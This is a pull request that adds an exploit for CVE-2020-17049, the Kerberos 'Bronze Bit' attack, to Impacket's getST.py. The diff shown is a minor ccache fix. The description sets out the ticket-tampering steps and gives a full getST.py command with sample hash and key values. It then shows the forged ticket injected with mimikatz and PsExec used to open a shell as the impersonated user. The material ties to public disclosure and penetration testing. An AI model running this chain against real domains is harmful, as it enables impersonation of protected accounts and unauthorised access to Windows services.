### PR TITLE
Exploit for CVE-2020-17049: new -force-forwardable flag for getST.py

### DIFF
--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -498,7 +498,9 @@ class CCache:
         credential['time']['authtime'] = self.toTimeStamp(types.KerberosTime.from_asn1(encTGSRepPart['authtime']))
         credential['time']['starttime'] = self.toTimeStamp(types.KerberosTime.from_asn1(encTGSRepPart['starttime']))
         credential['time']['endtime'] = self.toTimeStamp(types.KerberosTime.from_asn1(encTGSRepPart['endtime']))
-        credential['time']['renew_till'] = self.toTimeStamp(types.KerberosTime.from_asn1(encTGSRepPart['renew-till']))
+        # After KB4586793 for CVE-2020-17049 this timestamp may be omitted
+        if encTGSRepPart['renew-till'].hasValue():
+            credential['time']['renew_till'] = self.toTimeStamp(types.KerberosTime.from_asn1(encTGSRepPart['renew-till']))
 
         flags = self.reverseFlags(encTGSRepPart['flags'])
         credential['tktflags'] = flags


### PR DESCRIPTION
This pull request adds the exploit for [CVE-2020-17049](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049) the "Kerberos Bronze Bit" attack. An overview of the vulnerabiltiy is available [here](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-overview), and a deep dive into the issue is [here](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory). 

An in-depth review of the exploit, including detailed examples and attack paths, is available in this [blog post](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack). The key changes are summarized below. 

This PR adds a new `-force-forwardable` flag to [getST.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/). When the flag is enabled, the program's execution will go through these steps (with the new additions in **bold**):
1. The program will obtain a TGT as the Service Principal specified on the command line, using the secret keys secret keys provided through the `-hashes` and/or `-aesKey` arguments.
2. The program will perform the S4U2self exchange with its TGT to obtain a service ticket to that Service Principal as the user specified through the `-impersonate` argument. 
3. **The program will decrypt the service ticket using the Service Principal's same secret keys used in step 1.**
4. **The program will edit the service ticket, setting the "forwardable" flag to 1.** 
5. **The program will re-encrypt the edited service ticket using the Service Principal's secret keys.**
6. The programm will perform the S4U2proxy exchange with the service ticket and its TGT to obtain a service ticket as the impersonated user to the service specified through the `-spn` argument
7. The program will output the resulting service ticket, which can be used to authenticate to the target service and impersonate the target user. 

By editing the ticket and forcing its forwardable bit to 1, the program is able to impersonate users who are members of the Protected Users group, or configured with the "Account is sensitive and cannot be delegated" setting. This also allows the program to work with service's configured for "Kerberos-only" constrained delegation. 

In the example below, "Service1" is allowed to perform constrained delegation to "Service2" and User2 is configured as "sensitive and cannot be delegated." Without the `-force-forwardable` flag, the S4U2proxy exchange fails because the ticket returned by S4U2self is not forwardable. With the new flag, the program is successful and produces a service ticket which can be used to impersonate User2. The ticket can be loaded in via mimikatz, and immediately used to access Service2 as User2.
```
PS C:\Tools> getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating User2
[*]     Requesting S4U2self
[*]     Forcing the service ticket to be forwardable
[*]     Requesting S4U2Proxy
[*] Saving ticket in User2.ccache
PS C:\Tools> .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit

[TRUNCATED]
mimikatz(commandline) # kerberos::ptc User2.ccache

Principal : (01) : User2 ; @ test.local

Data 0
           Start/End/MaxRenew: 12/8/2020 5:27:18 PM ; 12/9/2020 3:27:17 AM ; 12/9/2020 5:27:17 PM
           Service Name (02) : cifs ; Service2.test.local ; @ TEST.LOCAL
           Target Name  (02) : cifs ; Service2.test.local ; @ TEST.LOCAL
           Client Name  (01) : User2 ; @ test.local
           Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000017 - rc4_hmac_nt
             38db4a12112e511fdaf969adb98db2f3
           Ticket            : 0x00000000 - null              ; kvno = 2        [...]
           * Injecting ticket : OK

mimikatz(commandline) # exit
Bye!
PS C:\Tools> .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe

[TRUNCATED]

PS C:\Windows\system32> whoami
test\user2
```

Microsoft has released fixes for this vulnerability, so it will not be successful against a fully patched domain controller. If the DC has been patched, you'll see the following error: 
```
PS C:\Tools> getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating User2
[*]     Requesting S4U2self
[*]     Forcing the service ticket to be forwardable
[*]     Requesting S4U2Proxy
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
```